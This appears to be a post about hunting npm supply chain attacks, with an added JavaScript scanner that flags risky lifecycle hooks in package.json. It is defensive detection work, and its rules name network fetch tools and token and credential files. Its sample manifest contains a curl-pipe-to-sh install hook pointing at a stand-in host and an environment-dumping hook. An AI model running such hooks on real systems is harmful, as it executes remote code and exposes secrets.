
Hunting the Behavior Behind npm Supply Chain Attacks
npm supply chain attacks are no longer “theoretical”.
TanStack. Axios. Trivy. Bitwarden. SAP. Intercom.
Attackers are abusing:
- GitHub Actions
- OIDC tokens
- npm lifecycle hooks
- trusted CI/CD pipelines
We built an AI-assisted hunting pipeline to detect the behavioral kill chain behind these attacks instead of chasing IOC crumbs.
Real queries. Real telemetry pitfalls. Real lessons learned.
u/shantanu14g — 8 days ago
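Added example (not from the post and not the poster's pipeline): a minimal hunt over npm lifecycle hooks, the one vector in the list above that can be checked from a package manifest alone. It parses a constructed package.json, looks only at the script names npm runs automatically, and flags behaviors (fetch-and-pipe, inline eval, token or env reads) instead of specific IOCs. The hook names are npm's own; the indicator regexes, the sample manifest and the function names are assumptions of this example.

```javascript
// Added example, not the poster's code. Flags behavioral indicators in npm
// lifecycle hooks declared in a package.json. Hook names are npm's; the
// indicator patterns below are this example's assumptions, not an official list.
const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "preuninstall", "postuninstall",
  "prepare", "prepublish", "prepublishOnly", "prepack", "postpack",
];

// Each rule: regex over the hook's command line, an id and a severity.
// No /g flag: RegExp.test with /g keeps lastIndex state between calls.
const RULES = [
  { id: "network-fetch",  severity: "high",   re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { id: "pipe-to-shell",  severity: "high",   re: /\|\s*(ba|z|da)?sh\b/ },
  { id: "inline-eval",    severity: "high",   re: /\bnode\s+(-e|--eval)\b/ },
  { id: "base64-decode",  severity: "medium", re: /\b(base64\s+(-d|--decode)|atob\(|from\([^)]*,\s*['"]base64['"]\))/ },
  { id: "secret-read",    severity: "high",   re: /(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY|ACTIONS_ID_TOKEN_REQUEST_TOKEN|\.npmrc|\.git-credentials)/ },
  { id: "env-dump",       severity: "medium", re: /\b(printenv|env\b\s*(>|\|)|process\.env\b)/ },
  // A hook that just runs a local file hides the real behavior in that file:
  // low severity on its own, but the file must be read next.
  { id: "local-script",   severity: "low",    re: /\bnode\s+(\.\/)?[\w./-]+\.(c|m)?js\b/ },
];

// Returns one finding per (hook, rule) match. Unparseable input is itself a
// finding, since a manifest that fails to parse cannot be cleared.
function scanLifecycleScripts(packageJsonText) {
  let pkg;
  try {
    pkg = JSON.parse(packageJsonText);
  } catch (_err) {
    return [{ hook: null, rule: "unparseable-package-json", severity: "medium", script: null }];
  }
  const scripts = pkg && typeof pkg.scripts === "object" && pkg.scripts ? pkg.scripts : {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const script = scripts[hook];
    if (typeof script !== "string") continue;
    for (const rule of RULES) {
      if (rule.re.test(script)) {
        findings.push({ hook, rule: rule.id, severity: rule.severity, script });
      }
    }
  }
  return findings;
}

// Highest severity across findings, or "none" when the manifest is clean.
function maxSeverity(findings) {
  const rank = { none: 0, low: 1, medium: 2, high: 3 };
  return findings.reduce((acc, f) => (rank[f.severity] > rank[acc] ? f.severity : acc), "none");
}

// Constructed sample manifest (hypothetical package and URL, not a real one).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-widget",
  version: "1.2.3",
  scripts: {
    test: "node --test",
    build: "tsc -p .",
    preinstall: "node scripts/setup.js",
    postinstall: "curl -s https://example.invalid/i.sh | sh",
    prepare: "node -e \"require('child_process').execSync('printenv > /tmp/e')\"",
  },
});

function scanSample() {
  return scanLifecycleScripts(SAMPLE_PACKAGE_JSON);
}

// Stand-alone run: print the findings and the overall verdict.
const sampleFindings = scanSample();
for (const f of sampleFindings) {
  console.log(`${f.severity.padEnd(6)} ${f.hook.padEnd(12)} ${f.rule.padEnd(14)} ${f.script}`);
}
console.log(`verdict: ${maxSeverity(sampleFindings)}`);
```

Two caveats a hunter would want: hooks are inherited transitively, so the scan has to run over every package in the resolved tree (the contents of `node_modules`, or the tarballs before `npm install` runs them with scripts enabled), and anything flagged `local-script` only moves the question into the referenced file. Installing with `--ignore-scripts` is the runtime counterpart of this check. The GitHub Actions and OIDC side of the kill chain is not visible from a manifest at all and needs CI and token-exchange telemetry instead.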